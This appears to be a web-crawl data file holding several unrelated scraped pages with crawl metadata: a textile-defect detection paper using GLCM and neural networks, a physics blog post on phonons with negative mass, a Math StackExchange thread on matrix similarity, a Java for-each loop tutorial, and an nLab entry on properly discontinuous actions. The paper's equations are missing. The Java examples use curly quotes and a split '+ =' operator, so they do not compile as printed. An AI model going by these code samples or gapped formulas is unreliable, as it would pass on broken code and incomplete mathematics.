(GLCM) and neural networks that used as a classifier to identify the textile defects. GLCM is a widely used texture descriptor . The statistical features of GLCM are based on gray level intensities of the image. Such features of the GLCM are useful in texture recognition , image segmentation , image retrieval , color image analysis , image classification , object recognition and texture analysis methods etc. The statistical features are extracted from GLCM of the textile digital image. GLCM is used as a technique for extracting texture features. The neural networks are used as a classifier to detect the presence of defects in textiles fabric products.\n\nThe paper is organized as follows. In the next sections, we introduce a brief presentation of GLCM. In section 3, the concept of neural networks with Training Multilayer Perceptrons is described. Image Analysis (Feature Extraction & Preprocessing Data) is given in section 4. Numerical simulation and discussion are presented in section 5; in the end a conclusion is given.\n\n2. Gray-Level Co-Occurrence Matrix (GLCM)\n\nOne of the simplest approaches for describing the texture is using a statistical moment of the histogram of the intensity of an image or region . Using a statistical method such as co-occurrence matrix is important to get valuable information about the relative position of neighboring pixels of an image. Either the histogram calculation give only the measures of texture that carry only information about the intensity distribution, but not on the relative position of pixels with respect to each other in that the texture.\n\nGiven an image I, N × N, the co-occurrence, and the matrix P defined as:", null, ". (1)\n\nIn the following, we present and review some features of a digital image by using GLCM. Those are Energy, Contrast, Correlation, and Homogeneity (features vector). The energy known as uniformity of ASM (angular second moment) calculated as:\n\nEnergy:", null, ". (2)\n\nContrast measurements of texture or gross variance, of the gray level. The difference is expected to be high in a coarse texture if the gray scale contrast is significant local variation of the gray level. Mathematically, this feature is calculated as:\n\nContrast:", null, ". (3)\n\nTexture correlation measures the linear dependence of gray levels on those of neighboring pixels (1). This feature computed as:\n\nCorrelation:", null, "(4)\n\nwhere", null, ",", null, "", null, "", null, ".\n\nThe homogeneity measures the local correlation a pair of pixels. The homogeneity should be high if the gray level of each pixel pair is similar. This calculated function as follows:\n\nHomogeneity:", null, ". (5)\n\n3. Neural Networks Construction\n\nArtificial neural networks (ANN) are very massively parallel connected structures that composed of some simple processing units nonlinear. Because of their massively parallel structure, they can perform high-speed calculations if implemented on dedicated hardware. In addition to their adaptive nature, they can learn the characteristics of the input signals and to adapt the data changes. The nonlinear character of the ANN can help to perform the function approximation, and signal filtering operations that are beyond optimal linear techniques see - . The output layer used to provide an answer for a given set of input values (Figure 1). In this work the Multilayer Feed-Forward Artificial Neural Networks is used as classifier, where the objective of the back- propagation training is to change the weights connection of the neurons in a direction which minimizes the error E, Which defined as the squared difference between the desired and actual results output nodes. The variation of the connection weight at the kth iteration defined by the following equation:", null, "(6)\n\nwhere (η) is the proportionality constant termed learning rate and (α) is a momentum term for more information (see - ).\n\nOnce the number of layers and the number of units in each layer selected the weights and network thresholds should set so as to minimize the prediction error made by the system. That is the goal of learning algorithms that used to adjust the weights and thresholds automatically to reduce this error (see ).\n\n4. Image Analysis (Feature Extraction & Preprocessing Data)\n\nThe feature extraction defined as the transforming of the input data into a set of characteristics with dimensionality reduction. In the other words, the input data to an algorithm will be converted into a reduced representation set of features (features vector).\n\nIn this paper, we’re extracting some characteristics of a digital image by using GLCM. Those are Contrast, Correlation, Energy, and Homogeneity. The system was implemented by using MATLAB program. We put the Matlab functions that we utilized in this work between the two <<>>. The proposed system composed of mainly three modules: pre-processing, segmentation and Feature extraction. Pre-processing is done by median filtering < >. Segmentation is carried out by Otsu method < >. Feature extraction based on GLCM features (Contrast, Correlation, Homogeneity, and Energy) implemented by < >. The extraction of the textural characteristics of the segmented image is done by using gray level co- occurrence matrices (GLCM). The textural characteristics extracted from four spatial orientations; horizontal, left diagonal vertical and right diagonal corresponding to (0o, 45o, 90o, and 135o) using < > with the offsets {[0 1], [−1 1], [−1 0], [−1 −1]}, that are defined as a neighboring pixel in the four possible directions (see Figure 2).\n\nIn the following subsection 4.1, we present a descriptor based on GLCM computation.\n\n4.1. GLCM Descriptorsteps\n\n1) Preprocessing (color to gray, noise, resize (256 × 256));\n\nFigure 1. Feed-forward neural with three layers.\n\nFigure 2. Adjacency of pixel in four directions (horizontal, vertical, left and right diagonals).\n\n2) Segmentation;\n\n3) Feature extraction based on GLCM features using < > with the Offset [0 1; −1 1; −1 0; −1 −1];\n\n4) Concatenation the Contrast, Correlation, Energy and Homogeneity.\n\nThe proposed algorithm implemented in MATLAB program developed by the author. After the application of the GLCM descriptor steps (4.1) to the image, we obtained a feature vector of dimension equal to 16 as input for neural networks classifier (Figure 3). The data set divided into two sets, one for training, and one for testing. Preprocessing parameters determined by using a matrix containing all the functionality that used for training or testing; the same settings were used to pre-treat the test feature vectors before transmission to the trained neural network.\n\nA fixed number (m) of examples from each class assigned to the training set and the remaining (m - n) of the testing set. The inputs and targets are normalized, they have means equal zero and standard deviation = 1. The Forward Feed Back-propagation network trained using normalized training sets. The number of inputs of ANN equal to the number of features (m = 16). Each hidden layer contains 2 m neurons and two outputs equal to the number of classes (without defects, with defects) Figure 4 and Figure 5 respectively.\n\n4.2. Simulation and Discussion\n\nWe have been developing a real database made by 1500 Images of jeans tissue. Some Images contain defects. The momentum is 0.9 and learning rate is 0.01 ((h, a in the Equation (1)). The ANN output represented by a vector belongs to [0, 1]n. We describe all the features of the training set in a form matrix FM. Each column represents the pattern features. If the training set contains m instances for each model, which belongs to a class, the dimension of the matrix FM is equal to m x n. Where m is the number of features (feature vector size), and n is the number classes. The number of columns 1, 2, 3 … of the matrix FM represents the instance of the model characteristics (textile) that belongs to the class 1. The columns number", null, ", represents the instance features of the pattern (textile) which belongs to the class 2, etc. (see Figure 6(a) with d = 6 and Figure 6(b) with d = 9).", null, "(7)\n\n and exist more information about the formulation of input and outputs. The accuracy of the system is calculated by using the following equation:", null, "(8)\n\nwhere the numbers of the correct images identification and is the total number of the images testing.\n\nLearning set contains six patterns for each category, and the testing set contains nine patterns for each type with accuracy 100%. The system learned with 7 images of each class and tested with 11, 13, 18, 21, 23, 28 images of each category. Figure 7 shows the system accuracy, the best 100% and the worst is 91%. The best 100% results identification obtained when the sizes of each class are 11, 13, and 18.\n\nThe system learned with ten images sample of each category and tested with 1, 2… 26 images of each type.\n\nFigure 3. Flowchart of the proposed method.\n\nFigure 4. Example of image without defect.\n\nFigure 5. Example of image with defect.\n\n(a) (b)\n\nFigure 6. (a) Neural output matrix with learning set, 6 patterns for class (100%); (b) Neural output matrix with Testing set, 9 patterns for class (100%).\n\nFigure 8 shows the system accuracy, the best is 100% and the worst is 90.5%. We obtained the best results 100% identification when the sizes of class testing are 1, 2 … 15.\n\nFigure 7 shows the correlation between the system accuracy and the size of testing data set. With a given data set of learning, the increasing numbers of patterns in the class for testing lead to decreasing the system efficiency. Increase the rate of the examples used in training to the examples used in the testing implies to increase the rate of recognition.\n\nFigure 7. (a)-(f): Neural output matrix with testing data set are 11, 13, 18, 21, 23, 28 patterns for each class, where the learning data set is 7.\n\nFigure 8. System efficiency with different size of testing data set (1, 2, … , 26), where size of learning data set = 10.\n\n5. Conclusion\n\nWe studied and developed an efficient method of textile defects identification based on GLCM and Neural Networks. The descriptor of the textile image based on statistical features of GLCM is used as input to neural networks classifier for recognition and classification defects of raw textile. One hidden layer feed-forward neural networks is used. Experimental results showed that the proposed method is efficient, and the recognition rate is 100% for training and the 100%, 91% best and worst for testing respectively. This study can take part in developing a computer-aided decision (CAD) system for Tissue online Automatic Inspection (TAI). In future work, various effective features will be extracted from the textile image used with other classifiers such as support vector machine.\n\nConflicts of Interest\n\nThe authors declare no conflicts of interest.\n\n Abdel Azim, G. and Nasir, S. (2013) Textile Defects Identification Based on Neural Networks and Mutual Information. International Conference on Computer Applications Technology (ICCAT), Sousse Tunisia, 20-22 January 2013, 98. http://dx.doi.org/10.1109/ICCAT.2013.6522055 Davis, L.S. (1975) A Survey on Edge Detection Techniques. Computer Graphics and Image Processing, 4, 248-270. http://dx.doi.org/10.1016/0146-664X(75)90012-X Huang, D.-S., Wunsch, D.C., Levine, D.S. and Jo, K.-H., Eds. (2008) Advanced Intelligent Computing Theories and Applications—With Aspects of Theoretical and Methodological Issues. Proceedings of the 4th International Conference on Intelligent Computing (ICIC), 15-18 China, September 2008, 701-708. Walker, R.F., Jackway, P.T. and Longstaff, I.D. (1997) Recent Developments in the Use of Co-Occurrence Matrix for Texture Recognition. Proceedings of the 13th International Conference on Digital Signal Processing, Brisbane—Queensland University, 1997. http://dx.doi.org/10.1109/ICDSP.1997.627968 Sahoo, M. (2011) Biomedical Image Fusion and Segmentation Using GLCM. International Journal of Computer Application Special Issue on “2nd National Conference—Computing, Communication and Sensor Network” CCSN, 34-39. Gonzalez, R.C. and Woods, R.E. (2002) Digital Image Processing. 2nd Edition, Prentice Hall, India. Kekre, H.B., Sudeep, D.T., Taneja, K.S. and Suryawanshi, S.V. (2010) Image Retrieval Using Texture Features Extracted from GLCM, LBG and KPE. International Journal of Computer Theory and Engineering, 2, 1793-8201. http://dx.doi.org/10.7763/ijcte.2010.v2.227 Haddon, J.F. and Boyce, J.F. (1993) Co-Occurrence Matrices for Image Analysis. IEEE Electronics & Communication Engineering Journal, 5, 71-83. http://dx.doi.org/10.1049/ecej:19930013 de Almeida, C.W.D., de Souza, R.M.C.R. and Candeias, A.L.B. (2010) Texture Classification Based on a Co-Occurrence Matrix and Self-Organizing Map. IEEE International Conference on Systems Man & Cybernetics, University of Pernambuco, Recife, 2010. http://dx.doi.org/10.1109/icsmc.2010.5641934 Haralick, R.M., Shanmugam, S. and Dinstein, I. (1973) Textural Features for Image Classification. IEEE Transactions on Systems, Man, and Cybernetics, 3, 610-621. Flusser, J. and Suk, T. (1993) Pattern Recognition by Affine Moment Invariants. Pattern Recognition, 26, 167-174. http://dx.doi.org/10.1016/0031-3203(93)90098-H Lo, C.H. and Don, H.S. (1989) 3D Moment Forms: Their Construction and Application to Object Identification and Positioning. IEEE Transactions on Pattern Analysis and Machine Intelligence, 11, 1053-1064. http://dx.doi.org/10.1109/34.42836 Srinivasan, G.N. and Shobha, G. (2008) Segmentation Techniques for ATDR. Proceedings of the World Academy of Science, Engineering, and Technology, 36, 2070-3740. Tuceryan, M. (1994) Moment Based Texture Segmentation. Pattern Recognition Letters, 15, 659-667. http://dx.doi.org/10.1016/0167-8655(94)90069-8 Gonzalez, R.C. and Woods, R.E. (2008) Digital Image Processing. 3rd Edition, Prentice Hall, India. Eleyan, A. and Demirel, H. (2011) Co-Occurrence Matrix and Its Statistical Features as a New Approach for Face Recognition. Turkish Journal of Electrical Engineering and Computer Science, 19, No.1. Krose, B. and Van Der Smagt, P. (1996) An Introduction to Neural Networks. 8th Edition. http://www.fwi.uva.nl/research/neuro Bishop, C. (1995) Neural Networks for Pattern Recognition. Clarendon Press, Oxford, UK. Freeman, J.A. and Skapura, D.M. (1991) Neural Networks: Algorithms, Applications and Programming Techniques. Addison-Wesley, Reading. Rumelhart, D.E., Hinton, G.E. and Williams, R.J. (1986) Learning Internal Representations by Error Propagation. In: Rumelheart, D.E. and McClelland, J.L., Eds., Parallel Distributed Processing: Explorations in the Microstructure of Cognition: Foundations, MIT Press, Cambridge, 318-362. Rumelhart, D.E., Durbin, R. Golden, R. and Chauvin, Y. (1995) Back Propagation: The Basic Theory. In: Chauvin, Y. and Rumelheart, D.E., Eds., Back Propagation: Theory, Architectures and Applications, Lawrence Erlbaum, Hillsdale, 1-34. Rumelhart, D.E., Hinton, G.E. and Williams, R.J. (1986) Learning Representations by Back-Propagating Errors. Nature, 323, 533-536. http://dx.doi.org/10.1038/323533a0 Patterson, D. (1996) Artificial Neural Networks. Prentice Hall, Singapore. Haykin, S. (1994) Neural Networks: A Comprehensive Foundation. Macmillan Publishing, New York. Azim, G.A. and Sousow, M.K. (2008) Multi-Layer Feed Forward Neural Networks for Olive Trees Identification. IASTED, Conference on Artificial Intelligence and Application, Austria, 11-13 February 2008, 420-426. Kattmah, G. and Azim, G.A. (2013) Fig (Ficus Carica L.) Identification Based on Mutual Information and Neural Networks. International Journal of Image Graphics and Signal Processing (IJIGSP), 5, No. 9.", null, "", null, "", null, "", null, "", null, "+1 323-425-8868", null, "[email protected]", null, "+86 18163351462(WhatsApp)", null, "1655362766", null, "", null, "Paper Publishing WeChat", null, "" ]
[ null, "https://html.scirp.org/file/1-1730282x4.png", null, "https://html.scirp.org/file/1-1730282x5.png", null, "https://html.scirp.org/file/1-1730282x6.png", null, "https://html.scirp.org/file/1-1730282x7.png", null, "https://html.scirp.org/file/1-1730282x8.png", null, "https://html.scirp.org/file/1-1730282x9.png", null, "https://html.scirp.org/file/1-1730282x10.png", null, "https://html.scirp.org/file/1-1730282x11.png", null, "https://html.scirp.org/file/1-1730282x12.png", null, "https://html.scirp.org/file/1-1730282x13.png", null, "https://html.scirp.org/file/1-1730282x14.png", null, "https://html.scirp.org/file/1-1730282x15.png", null, "https://html.scirp.org/file/1-1730282x18.png", null, "https://html.scirp.org/file/1-1730282x19.png", null, "https://html.scirp.org/file/1-1730282x20.png", null, "https://www.scirp.org/images/Twitter.svg", null, "https://www.scirp.org/images/fb.svg", null, "https://www.scirp.org/images/in.svg", null, "https://www.scirp.org/images/weibo.svg", null, "https://www.scirp.org/images/phone02.jpg", null, "https://www.scirp.org/images/emailsrp.png", null, "https://www.scirp.org/images/whatsapplogo.jpg", null, "https://www.scirp.org/Images/qq25.jpg", null, "https://www.scirp.org/images/weixinlogo.jpg", null, "https://www.scirp.org/images/weixinsrp120.jpg", null, "https://www.scirp.org/Images/ccby.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9097018,"math_prob":0.7936762,"size":11536,"snap":"2023-40-2023-50","text_gpt3_token_len":2493,"char_repetition_ratio":0.13120013,"word_repetition_ratio":0.019148936,"special_character_ratio":0.22650832,"punctuation_ratio":0.11583924,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96564096,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-11-30T11:51:57Z\",\"WARC-Record-ID\":\"<urn:uuid:083f3816-6dd8-459b-a75f-48211eba347a>\",\"Content-Length\":\"115606\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f63558ec-8c5a-46af-8c9a-5684b65f8b40>\",\"WARC-Concurrent-To\":\"<urn:uuid:4b1f9737-599f-4d10-9ed4-ea3c715f5f02>\",\"WARC-IP-Address\":\"107.191.112.46\",\"WARC-Target-URI\":\"https://www.scirp.org/journal/paperinformation.aspx?paperid=61639\",\"WARC-Payload-Digest\":\"sha1:K6TP34OYOYLMUQPWR7YXCZEUGC3IQFIF\",\"WARC-Block-Digest\":\"sha1:S5DOJTJT2X6OEOWCRVAGTQMXVQBS4TPE\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100184.3_warc_CC-MAIN-20231130094531-20231130124531-00167.warc.gz\"}"}
https://math.stackexchange.com/questions/4245724/a-question-related-to-similarity-of-a-complex-matrix-that-is-not-scalar-multiple
[ "# A question related to similarity of a Complex matrix that is not scalar multiple of $I_n$\n\nThis question was asked in a masters exam for which I am preparing and I was unable to solve it.\n\nLet $$A$$ be an $$n\\times n$$ complex matrix that is not the scalar multiple of $$I_n$$. Then show that $$A$$ is similar to a matrix $$B$$ such that $$B_{1,1}$$( ie the top left entry of $$B$$) is $$0$$.\n\nWell, I don't even have a intuition for this question's solution: I think in the case when $$A$$ is not a scalar multiple of $$I_n$$ but $$\\operatorname{rank} A = n$$ then I don't think $$B_{1,1}$$ will be $$0$$.\n\nI have studied theory from Hoffman and Kunze but I was unable to solve exercises due to my illness and I need help.\n\n• Just try to use a similarity transformation which changes this entry. Start with $n=2$ for an explicit calculation (to have some concrete understanding) and then generalize. Sep 9 at 8:00\n• The case of $2\\times2$-matrices is a very good start. You can use the matrix $\\begin{pmatrix}1&x\\\\0&1\\end{pmatrix}$ as a similarity matrix in the first step. Sep 9 at 8:15\n• the minimal polynomial is degree at least 2 and $A$ is similar to its Rational Canonical Form Sep 9 at 19:35\n\nThere are many ways to solve this question. Assume $$n \\geq 2$$ (otherwise there is nothing to prove) and let $$T = T_A \\colon \\mathbb{C}^n \\rightarrow \\mathbb{C}^n$$ be the associated linear map given by $$T_A(x) = Ax$$. Assume that we can find $$0 \\neq v \\in \\mathbb{C}^n$$ that is not an eigenvector of $$T$$. This means that $$v \\neq 0$$ and $$T(v)$$ is not a scalar multiple of $$v$$ so $$\\{ v, T(v) \\}$$ is linearly independent. Complete $$\\{ v, T(v) \\}$$ to a ordered basis $$\\mathcal{B} = \\left( v, T(v), v_3, \\dots, v_n \\right)$$ of $$\\mathbb{C}^n$$. Then the matrix representing $$T$$ with respect to $$\\mathcal{B}$$ is similar to $$A$$ and has $$\\begin{pmatrix} 0 \\\\ 1 \\\\ 0 \\\\ \\vdots \\\\ 0 \\end{pmatrix}$$ as first column.\nThis leaves you with proving that if $$A$$ is not a scalar multiple of the identity then one can find at least one non-zero vector which is not an eigenvector of $$A$$. I'll leave this as an exercise (whose solution you can find on this website).\n• I have some questions: Why \"Then the matrix representing T with respect to B is similar to A\" holds? and why it has$\\begin{pmatrix} 0 \\\\ 1 \\\\ 0 \\\\ \\vdots \\\\ 0 \\end{pmatrix}$ as first column ? Please explain? Sep 18 at 11:35\n• @James: Whenever you represent a linear map with respect to two different bases, you get similar matrices. In this case, $T$ is represented by $A$ with respect to the standard basis. Regarding the second question, this follows immediately from the definition of the representing matrix... You have $T(v) = 0 \\cdot v + 1 \\cdot T(v) + 0 \\cdot v_3 + \\dots + 0 \\cdot v_n$ which means that the coefficients, rearranged as a column, form the first column of the representing matrix. Sep 21 at 22:56" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9811638,"math_prob":0.9999045,"size":603,"snap":"2021-43-2021-49","text_gpt3_token_len":173,"char_repetition_ratio":0.08681135,"word_repetition_ratio":0.017391304,"special_character_ratio":0.29353234,"punctuation_ratio":0.067669176,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999974,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-11-28T19:55:22Z\",\"WARC-Record-ID\":\"<urn:uuid:a96b01eb-f77f-424f-91c1-8757e3d93c9e>\",\"Content-Length\":\"142172\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:23be3a0c-a68d-4ddf-965d-5089632811e3>\",\"WARC-Concurrent-To\":\"<urn:uuid:f76b1ac9-c38d-4313-b77a-16ea7528c90c>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://math.stackexchange.com/questions/4245724/a-question-related-to-similarity-of-a-complex-matrix-that-is-not-scalar-multiple\",\"WARC-Payload-Digest\":\"sha1:KYGBFQYZXMSWWC7R2WN347MVFKB4QP4O\",\"WARC-Block-Digest\":\"sha1:T5HNRUEXIP7ABUDVTHOQOAA76J4AXWMD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964358591.95_warc_CC-MAIN-20211128194436-20211128224436-00534.warc.gz\"}"}
https://ded9.com/tutorial-for-each-loop-in-java-in-very-simple-language/
[ "# blog posts", null, "# In Java, there is another form of loop (in addition to the standard for loop) for working with arrays and sets.\n\nIf you are working with arrays and sets, you can use another for loop structure (advanced for loop form) to duplicate their items.\n\nThis type of loop is called for-each because the loop is repeated through each array / set element.\n\nHere is an example of repeating elements of an array using the standard for loop in Java:\n\n1. class ForLoop {\n2. public static void main (String [] args) {\n3. char [] vowels = {‘a’, ‘e’, ​​’i’, ‘o’, ‘u’};\n4. for (int i = 0; i <vowels.length; ++ i) {\n5. System.out.println (vowels [i]);\n6. }\n7. }\n8. }\n\n#### You can also write the above code using the for-each loop:\n\n1. class AssignmentOperator {\n2. public static void main (String [] args) {\n3. char [] vowels = {‘a’, ‘e’, ​​’i’, ‘o’, ‘u’};\n4. // foreach loop\n5. for (char item: vowels) {\n6. System.out.println (item);\n7. }\n8. }\n9. }\n\n#### The output of both codes is similar and equal to:\n\n1. a\n2. e\n3. i\n4. o\n5. u\n\nUsing the advanced for loop is easier to write and makes the code more readable. Hence it is usually recommended more than the standard form.\n\n## For-each ring structure\n\nFirst let’s look at the for-each loop structure:\n\nfor (data_type item: collection) {\n\n}\n\nIn the above structure,\n\n• collection is a collection or array on which you want to write a circle.\n• item is a single element of the collection.\n\n## How does the for-each loop work?\n\nHere’s how the for-each loop works.\n\n• Repeat through any element in the given array or collection,\n• Stores each item in an item.\n• And executes the body of the ring.\n\nExample: for-each loop\n\nThe following program calculates the sum of all the elements of an array of integers.\n\n1. class EnhancedForLoop {\n2. public static void main (String [] args) {\n3. int [] numbers = {3, 4, 5, -5, 0, 12};\n4. int sum = 0;\n5. for (int number: numbers) {\n6. sum + = number;\n7. }\n8. System.out.println (“Sum =” + sum);\n9. }\n10. }\n\nOutput\n\nSum = 19\n\nIn the above program, the execution of the for-each loop is as follows:", null, "You see a repeat of the for-each loop\n\n• All elements of numbers are repeated.\n• Each element is stored in the number variable.\n• The body of the loop is executed, ie the number is added to the sum." ]
[ null, "https://ded9.com/wp-content/uploads/2021/03/Tutorial-for…-each-loop-in-Java-in-very-simple-language.jpeg", null, "https://sariasan.com/wp-content/uploads/2019/09/word-image.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.82345355,"math_prob":0.9649787,"size":2245,"snap":"2023-40-2023-50","text_gpt3_token_len":592,"char_repetition_ratio":0.13699241,"word_repetition_ratio":0.10273973,"special_character_ratio":0.29888642,"punctuation_ratio":0.13636364,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9864104,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-28T07:05:38Z\",\"WARC-Record-ID\":\"<urn:uuid:51791798-ce5c-4221-92b0-27580c50bf6b>\",\"Content-Length\":\"77498\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:919321e1-bc1c-4909-98a5-77557672d8c9>\",\"WARC-Concurrent-To\":\"<urn:uuid:a91ea01c-6d59-4236-a703-9efdec600016>\",\"WARC-IP-Address\":\"178.63.74.241\",\"WARC-Target-URI\":\"https://ded9.com/tutorial-for-each-loop-in-java-in-very-simple-language/\",\"WARC-Payload-Digest\":\"sha1:6G2WGDJOKDSUSUPJK443BPX4RTTKYBCA\",\"WARC-Block-Digest\":\"sha1:KFLDDK4QER4F4UAIEQP2427VD3PSCKG7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510368.33_warc_CC-MAIN-20230928063033-20230928093033-00764.warc.gz\"}"}
http://nanoscale.blogspot.com/2018/08/phonons-and-negative-mass.html
[ "Saturday, August 18, 2018\n\nPhonons and negative mass\n\nThere has been quite a bit of media attention given to this paper, which looks at whether sound waves involve the transport of mass (and therefore whether they should interact with gravitational fields and produce gravitational fields of their own).\n\nThe authors conclude that, under certain circumstances, sound wavepackets (phonons, in the limit where we really think about quantized excitations) rise in a downward-directed gravitational field.  Considered as a distinct object, such a wavepacket has some property, the amount of \"invariant mass\" that it transports as it propagates along, that turns out to be negative.\n\nNow, most people familiar with the physics of conventional sound would say, hang on, how do sound waves in some medium transport any mass at all?  That is, we think of ordinary sound in a gas like air as pressure waves, with compressions and rarefactions, regions of alternating enhanced and decreased density (and pressure).  In the limit of small amplitudes (the \"linear regime\"), we can consider the density variations in the wave to be mathematically small, meaning that we can use the parameter $\\delta \\rho/rho_{0}$ as a small perturbation, where $\\rho_{0}$ is the average density and $\\delta \\rho$ is the change.  Linear regime sound usually doesn't transport mass.  The same is true for sound in the linear regime in a conventional liquid or a solid.\n\nIn the paper, the authors do an analysis where they find that the mass transported by sound is proportional with a negative sign to $dc_{\\mathrm{s}}/dP$, how the speed of sound $c_{\\mathrm{s}}$ changes with pressure for that medium.  (Note that for an ideal gas, $c_{\\mathrm{s}} = \\sqrt{\\gamma k_{\\mathrm{B}}T/m}$, where $\\gamma$ is the ratio of heat capacities at constant pressure and volume, $m$ is the mass of a gas molecule, and $T$ is the temperature.  There is no explicit pressure dependence, and sound is \"massless\" in that case.)\n\nI admit that I don't follow all the details, but it seems to me that the authors have found that for a nonlinear medium such that $dc_{\\mathrm{s}}/dP > 0$, sound wavepackets have a bit less mass than the average density of the surrounding medium.  That means that they experience buoyancy (they \"fall up\" in a downward-directed gravitational field), and exert an effectively negative gravitational potential compared to their background medium.  It's a neat result, and I can see where there could be circumstances where it might be important (e.g. sound waves in neutron stars, where the density is very high and you could imagine astrophysical consequences).  That being said, perhaps someone in the comments can explain why this is being portrayed as so surprising - I may be missing something.", null, "Anonymous said...\n\nAstro folks are trying to have fun again...", null, "Anonymous said...\n\nDouglas Natelson said...\n\nAnon@7:35, love it. When I was a kid, like 10, I saw some of these when they would broadcast his segments on PBS in Pittsburgh. They looked really old even then, but they were still fun.", null, "Josh W said...\n\nComing to this a little later, I think it's probably because visualising the mass of waves is something that tends to go along with quantum intuition, and sound is something that everyone already understands, so you know, it's a cool overlap of those two ideas.\n\nAlso, I was looking at phonons in crystals under the usual approach using sin functions, and they also seem to have negative effective masses for non-zero energy; based on finding the inverse of the second derivative matrix of the dispersion relation.\n\nI did a back of envelope calculation, and it came out something like (planck's constant)/((Debey Velocity)/(2*k) *(lattice constant)*(delta_i,j - *k_i*k_j /K^2))\n\nfor small deviations from zero,\n\nbut the more important thing is that looking at the dispersion relation curve, it has no minima, only maxima, so with the exception of 0 energy phonons, it will always have a negative curvature and a slightly negative mass.\n\nI'm still not sure what status effective mass has as a physical thing, but if it does, that would match up at least." ]
[ null, "http://resources.blogblog.com/img/blank.gif", null, "http://resources.blogblog.com/img/blank.gif", null, "http://resources.blogblog.com/img/blank.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9553599,"math_prob":0.9632705,"size":4115,"snap":"2019-26-2019-30","text_gpt3_token_len":918,"char_repetition_ratio":0.105327174,"word_repetition_ratio":0.0,"special_character_ratio":0.22332928,"punctuation_ratio":0.10613811,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97657543,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-06-16T16:32:25Z\",\"WARC-Record-ID\":\"<urn:uuid:207a4088-5111-41ae-8448-8c77c0f7f683>\",\"Content-Length\":\"110326\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:49b996c0-9ccd-4893-9012-72500c8f9d7a>\",\"WARC-Concurrent-To\":\"<urn:uuid:678d3110-04fc-4433-bbb9-9372e3adc0af>\",\"WARC-IP-Address\":\"172.217.7.161\",\"WARC-Target-URI\":\"http://nanoscale.blogspot.com/2018/08/phonons-and-negative-mass.html\",\"WARC-Payload-Digest\":\"sha1:7MB4B7PAP2U4EUI7WBBLWMHDFEZ6EPMO\",\"WARC-Block-Digest\":\"sha1:3HHMMKTCZC5KXNECCDPJIM2HAPQ2AW6B\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-26/CC-MAIN-2019-26_segments_1560627998288.34_warc_CC-MAIN-20190616162745-20190616184745-00559.warc.gz\"}"}
https://www.ncatlab.org/nlab/show/properly+discontinuous+action
[ "Contents\n\n# Contents\n\n## Definition\n\nThe action of a topological group $G$ on a topological space $X$ is called properly discontinuous if every point $x \\in X$ has a neighbourhood $U_x$ such that the intersection $g(U_x) \\cap U_x$ with its translate under the group action via some element $g \\in G$ is non-empty only for the neutral element $e \\in G$:\n\n$g(U_x) \\cap U_x \\neq \\emptyset \\phantom{AA} \\Rightarrow \\phantom{AA} g = e$\n\nThis is equivalent to the condition that the quotient space coprojection $X \\longrightarrow X/G$ is a covering space-projection.\n\nTherefore properly discontinuous actions are also called covering space actions (Hatcher).\n\n• Jack Lee, chapter 12 of Introduction to Topological Manifolds\n\n• Jack Lee, chapter 21 of Introduction to Smooth Manifolds\n\n• Jack Lee, MO comment, Dec. 2014" ]
[ null ]
